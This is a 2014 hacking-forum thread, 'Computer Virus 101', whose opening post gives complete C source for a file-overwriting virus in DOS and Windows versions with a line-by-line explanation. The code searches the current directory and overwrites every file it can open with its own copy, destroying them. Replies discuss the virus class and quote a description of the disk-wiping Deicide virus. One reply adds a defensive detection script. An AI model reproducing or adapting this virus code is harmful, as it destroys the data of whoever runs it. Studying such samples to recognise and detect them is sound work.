
Author Topic: Computer Virus 101  (Read 6218 times)


Offline Clone

  • Peasant
  • Posts: 50
  • Cookies: 2
  • Always trying to find the value of x
Computer Virus 101
« on: February 16, 2014, 01:04:21 PM »
As we all know a computer virus is a self-replicating program of malicious intent.

https://en.wikipedia.org/wiki/Computer_virus

Most people are curious to learn how viruses are made so I googled and found the most common form of old school computer viruses in C....
Code: (C) [Select]
#include<stdio.h>
 #include<io.h>
 #include<dos.h>
 #include<dir.h>
 #include<conio.h>
 #include<time.h> FILE *virus,*host;
 int done,a=0;
 unsigned long x;
 char buff[2048];
 struct ffblk ffblk;
 clock_t st,end;
void main()
 {
 st=clock();
 clrscr();
 done=findfirst(“*.*”,&ffblk,0); //Search for a file with any extension (*.*)
 while(!done)
 {
 virus=fopen(_argv[0],”rb”);
 host=fopen(ffblk.ff_name,”rb+”);
 if(host==NULL) goto next;
 x=89088;
 printf(“Infecting %s\n”,ffblk.ff_name,a);
 while(x>2048)
 {
 fread(buff,2048,1,virus);
 fwrite(buff,2048,1,host);
 x-=2048;
 }
 fread(buff,x,1,virus);
 fwrite(buff,x,1,host);
 a++;
 next:
 {
 fcloseall();
 done=findnext(&ffblk);
 }
 }
 printf(“DONE! (Total Files Infected= %d)”,a);
 end=clock();
 printf(“TIME TAKEN=%f SEC\n”,
 (end-st)/CLK_TCK);
 getch();
 }
Viruses are common in Windows since a huge percentage of computer users are Windows based. So I thought why don't I replicate the above code in current Windows form....aah! What the hell, let's have fun! So I coded a replica:
Code: (C) [Select]
# include<stdio.h>
# include<windows.h> //call to a windows header file
# include<time.h>    //to be used to computer time take to infect

FILE*virus,*host;    //pointer to virus file and host file
int a,done;
WIN32_FIND_DATA FindFile;   //WIN32_FIND_DATA structure containing file information
                             //found by FindFirstFile,FindNextFile functions.
char buff[2048];
HANDLE hfind;//handle to a file object.
unsigned long x;
clock_t st,end;
void main(int argc,char*_argv[])
{
    st=clock();
    system("cls");//clrscr() clears the screen but in windows it will be undefined ref.
    hfind=FindFirstFile("*.*",&FindFile);//Searches for a files in current directory.
    while(done!=0)
    {


    if(hfind==INVALID_HANDLE_VALUE)
    {
        printf("Error %d:File(s) not found ",GetLastError());
        return ;
    }
    else
    {
        virus=fopen(_argv[0],"rb");
        host=fopen(FindFile.cFileName,"rb");
        if(host==NULL)goto next;
        x=89088;
        printf("Infecting %s...\n",FindFile.cFileName);
        while(x>2048)
        {
            fread(buff,2048,1,virus);
            fwrite(buff,2048,1,host);
            x-=2048;
        }
        fread(buff,2048,1,virus);
        fwrite(buff,2048,1,host);
        a++;
    next:
        {
        _fcloseall();//fcloseall() POSIX function.But its deprecated you can use _fcloseall instead.
        done=FindNextFile(hfind,&FindFile);//continues with searching from previous call
                                          //of FindFirstFile().Parameter are previous handle
                                          //to pointer FindFile.
        }
    }
    }
    printf("DONE! Total Files Infected=%d\n",a);
    end=clock();
    printf("TIME TAKEN to infect %d file is %f seconds\n",a,(end-st)/CLK_TCK);
    printf("%s\n",_argv[0]);
    getchar();


}
 

In fact there is no difference. But I will explain just in case someone wants to bug members of EZ about viruses and how they work. Please note that the above code has got a default child bug to prevent noobs from trying to claim it as their own code, and any antivirus software can identify this virus due to its heuristic nature.
The above virus:
1) Searches for files in the current directory.
2) Returns an error if file was not found.
3) Loads a copy of itself into memory.
4) Opens target file then copies itself thus destroying the host file.
5) Loads the next file to infect and repeats
First of all we include the header files and variables to be used or if you like "data to work on"
Code: (C) [Select]
# include<stdio.h>
# include<conio.h>
# include<windows.h> //call to a windows header file
# include<time.h>    //to be used to computer time take to infect

FILE*virus,*host;    //pointer to virus file and host file
int a,done=1;
WIN32_FIND_DATA FindFile;   //WIN32_FIND_DATA structure containing file information
                             //found by FindFirstFile,FindNextFile functions.
char buff[2048];
HANDLE hfind;//handle to a file object.
unsigned long x;
clock_t st,end;
I've included comments to explain what is going on in this section. Command line arguments here enable us to include the virus file destination without hard-coding it. From including int argc and char*_argv[], argc is the number of arguments passed and _argv is the array string of characters representing the arguments passed.
Code: (C) [Select]
void main(int argc,char*_argv[])

By default, _argv[0] is the name of the target executable.

Code: (C) [Select]
virus=fopen(_argv[0],"rb");
host=fopen(FindFile.cFileName,"rb+");
FindFirstFile("*.*",&FindFile) simply searches for files in the current directory and the info is stored and represented as FindFile which as mentioned is a pointer to the struct storing the file info, thus FindFile.cFileName is the name of the file after the search as the loop continues. process.system("cls") is the same as cls in MS-DOS, only that we have made it a system call. It's not really needed and can be removed.
Code: (C) [Select]
st=clock();
    system("cls");//clrscr() clears the screen but in modern windows it will be undefined ref.
    hfind=FindFirstFile("*.*",&FindFile);//Searches for a files in current directory.
    while(done!=0)
    {
As the MSDN says, "an object is a data structure that represents a system resource, such as a file, thread, or graphic image. An application cannot directly access object data or the system resource that an object represents. Instead, an application must obtain an object handle, which it can use to examine or modify the system resource." Thus there was need for the hfind handle to FindFirstFile() which, if the function succeeds, the return value is a search handle used in a subsequent call to FindNextFile() and the FindFile parameter contains information about the first file or directory found.
Code: (C) [Select]
if(hfind==INVALID_HANDLE_VALUE)
    {
        printf("Error %d:File(s) not found ",GetLastError());
        return ;
    }
and
Code: (C) [Select]
next:
        {
        _fcloseall();//fcloseall() POSIX function.But its deprecated you can use _fcloseall instead.
        done=FindNextFile(hfind,&FindFile);//continues with searching from previous call
                                          //of FindFirstFile().Parameter are previous handle
                                          //to pointer FindFile.
        }
From there it is basically write and read from *virus to *host file found with fread() and fwrite() function. The variable a will show the number of files infected as it's just a count until FindNextFile returns 0, then the loop stops. The below links will help if you don't understand file input/output in C. I can't do everything you know, but I can try to answer any questions.

References:
Quote
http://www.cplusplus.com/reference/cstdio/fwrite/
http://www.cplusplus.com/doc/tutorial/files/
http://www.cprogramming.com/tutorial/cfileio.html

http://www.gohacking.com/create-computer-virus/

Anyway, to prevent too much self-explanation: if you have basic C knowledge it's easy. It's just in Windows format. I hope you don't go around screwing up stuff but like I said it's basic and any AV can see through it.

But check out by Deque, the Java Queen!
http://evilzone.org/scripting-languages/%28python-source%29-basic-virus-infection-and-polymorphy/
« Last Edit: February 16, 2014, 05:26:05 PM by m0rph »
One who walks the line between light and dark, with no ties to either side. No morals or emotions clouding their judgment,able to accomplish tasks and solve problems in the most efficient and logical way.

Offline Phage

  • VIP
  • Overlord
  • Posts: 1280
  • Cookies: 120
Re: Computer Virus 101
« Reply #1 on: February 16, 2014, 01:28:02 PM »
I would work a bit on your grammar if I were you. Though it's not the worst grammar I've seen, it bothered me the whole way through the post. To be honest I'm not quite sure what to think about this? To me it seemed like you shared some C code of some wannabe virus and explained that all C programmers would understand this and we shouldn't fool around with it, yet you also tell us that every AV would detect it?
"Ruby devs do, in fact, get all the girls. No girl wants a python, but EVERY girl wants rubies" - connection

"It always takes longer than you expect, even when you take into account Hofstadter’s Law."

Offline Clone

Re: Computer Virus 101
« Reply #2 on: February 16, 2014, 02:07:53 PM »
Once again guys, it wasn't meant to wow anyone. I am sure there are gurus here who would consider the code a joke but maybe for a curious person it's a beginning step.

Phage, sorry for the bit of grammar, I was editing some explanation from MSDN. I wasn't targeting "Stuxnet virus", I simply made the Windows version of the virus from the gohacking website. AV will see this before the exe is executed and also the fact that it won't execute unless you change the value of the data. Test it out under an OS in Oracle VM, I am sure it will work.
« Last Edit: February 16, 2014, 02:23:06 PM by Clone »

Offline Deque

  • P.I.N.N.
  • Global Moderator
  • Overlord
  • Posts: 1203
  • Cookies: 518
  • Programmer, Malware Analyst
Re: Computer Virus 101
« Reply #3 on: February 16, 2014, 02:13:45 PM »
That's a nice code share for those who want to know how a virus can work. But yes, the explanations could be better.
This sample virus is the most simple one can think of; it overwrites the host file, thus it is destroying files every time it is executed. There have been popular viruses of that kind a long time ago, but now they don't survive long enough in the wild to spread.

Here is one example:

https://www.youtube.com/watch?v=13kagFBEB9o

Description:

Quote
Deicide is a parasitic virus that infects .COM files by just overwriting the start of file. Deicide avoids infecting COMMAND.COM.
When an infected file is run, Deicide will find and infect one file in the current directory; displaying the following message each time a file is infected.

"File corruption error."

If no infectable files can be found in the directory, Deicide will overwrite the first 80 sectors of the harddisk and show the following message:

"DEICIDE!
Glenn (666) says : BYE BYE HARDDISK!!
Next time be carufull with illegal stuff"

Thanks for the cross-reference to my paper.
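
A defender's triage check for the overwrite pattern discussed in this thread, added here as an example and not code from any poster: files of unrelated types in one directory that all begin with the same bytes. The function names, the three-file threshold and the sample data are assumptions; the 89088-byte length is the value hard-coded in the posted sample.

```python
import hashlib
import os
import tempfile
from collections import defaultdict

PREFIX_LEN = 89088   # copy length hard-coded in the posted sample (x=89088)
MIN_GROUP = 3        # assumption: flag when 3+ files share one prefix


def prefix_digest(path, length=PREFIX_LEN):
    """SHA-256 of the first `length` bytes; None if shorter or unreadable."""
    try:
        with open(path, "rb") as fh:
            head = fh.read(length)
    except OSError:
        return None
    return hashlib.sha256(head).hexdigest() if len(head) == length else None


def find_overwrite_clusters(directory, length=PREFIX_LEN, min_group=MIN_GROUP):
    """Group regular files in one directory by identical leading bytes."""
    groups = defaultdict(list)
    for entry in os.scandir(directory):
        if entry.is_file(follow_symlinks=False):
            digest = prefix_digest(entry.path, length)
            if digest:
                groups[digest].append(entry.name)
    clusters = []
    for names in groups.values():
        extensions = {os.path.splitext(n)[1].lower() for n in names}
        # Unrelated file types sharing one head is the overwrite signature.
        if len(names) >= min_group and len(extensions) > 1:
            clusters.append(sorted(names))
    return sorted(clusters)


def demo():
    """Constructed sample: harmless filler bytes stand in for the copied program."""
    filler = b"\x41" * 64
    with tempfile.TemporaryDirectory() as d:
        samples = {"report.txt": filler + b"tail-1", "photo.jpg": filler + b"tail-2",
                   "tool.exe": filler, "notes.txt": b"ordinary text " * 8,
                   "tiny.cfg": b"x=1"}
        for name, data in samples.items():
            with open(os.path.join(d, name), "wb") as fh:
                fh.write(data)
        return find_overwrite_clusters(d, length=len(filler))


if __name__ == "__main__":
    print(demo())
```

Files shorter than the prefix length are skipped, so the check only groups files large enough to have received the full copy.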

Offline Clone

Re: Computer Virus 101
« Reply #4 on: February 16, 2014, 02:31:27 PM »
Quote
Thanks for the cross-reference to my paper.

It really helped me since I was interested in comp viruses. Once again sorry for the bit of grammar

Offline Kulverstukas

  • Administrator
  • Zeus
  • Posts: 6627
  • Cookies: 542
  • Fascist dictator
Re: Computer Virus 101
« Reply #5 on: February 16, 2014, 02:33:22 PM »
As I understand, this doesn't infect anything, it just corrupts files by writing garbage to files. We want results, not excuses!

Also the post could do more formatting because it's kinda ugly right now. However overall, I'll give you your first cookie because of the effort :)
« Last Edit: February 16, 2014, 02:36:37 PM by Kulverstukas »

Offline Deque

Re: Computer Virus 101
« Reply #6 on: February 16, 2014, 02:37:16 PM »
Quote
As I understand, this doesn't infect anything, it just corrupts files by writing garbage to files, or am I wrong?

Also the post could do more formatting because it's kinda ugly right now. However overall, I'll give you your first cookie because of the effort :)

Not random garbage. It overwrites the host file with its own copy.

« Last Edit: February 16, 2014, 02:42:59 PM by Deque »

Offline Clone

Re: Computer Virus 101
« Reply #7 on: February 16, 2014, 02:42:53 PM »
Thanks chief! :o I am sorry for the grammar, format etc. Actually I am not usually on EZ, it's a once in a while kinda thing. As I stated, I learn and try to contribute...if I am wrong I am corrected.

Offline Kulverstukas

Re: Computer Virus 101
« Reply #8 on: February 16, 2014, 02:59:34 PM »
Quote
Thanks chief! :o I am sorry for the grammar, format etc. Actually I am not usually on EZ, it's a once in a while kinda thing. As I stated, I learn and try to contribute...if I am wrong I am corrected.

Stop with the excuses, ffs. It won't make your posts look better if you excuse all the time.
WE want RESULTS, not EXCUSES!
« Last Edit: February 16, 2014, 03:00:02 PM by Kulverstukas »

Offline Kulverstukas

Re: Computer Virus 101
« Reply #9 on: February 16, 2014, 04:26:28 PM »
I have no clue what you wanted to ask with your post.

Offline Clone

Re: Computer Virus 101
« Reply #10 on: February 16, 2014, 04:41:05 PM »
Quote
I have no clue what you wanted to ask with your post.

I mean like this:


with all the formats or like Deque's codes http://evilzone.org/scripting-languages/%28python-source%29-basic-virus-infection-and-polymorphy/
« Last Edit: February 16, 2014, 04:43:08 PM by Clone »

Offline Deque

Re: Computer Virus 101
« Reply #11 on: February 16, 2014, 04:53:23 PM »
Specify the language used in the code tag.
I.e. code=Java (but with square brackets)

Z3R0

  • Guest
Re: Computer Virus 101
« Reply #12 on: February 16, 2014, 05:26:29 PM »
Grammar and code formatting updated, plus a few hidden m0rph notes.
« Last Edit: February 16, 2014, 05:27:00 PM by m0rph »

Offline Clone

Re: Computer Virus 101
« Reply #13 on: February 16, 2014, 06:09:31 PM »

Quote
Grammar and code formatting updated, plus a few hidden m0rph notes.

Thanks a lot!

Quote
Specify the language used in the code tag.
I.e. code=Java (but with square brackets)

Thanks, I will try it

Staff note - refrain from double-posting. m0rph
« Last Edit: February 16, 2014, 06:13:21 PM by m0rph »

Offline Danus

  • Serf
  • Posts: 39
  • Cookies: 24
  • Jewish Coder
Re: Computer Virus 101
« Reply #14 on: March 08, 2014, 10:58:14 AM »
A very useful tutorial, I enjoyed reading this.

 


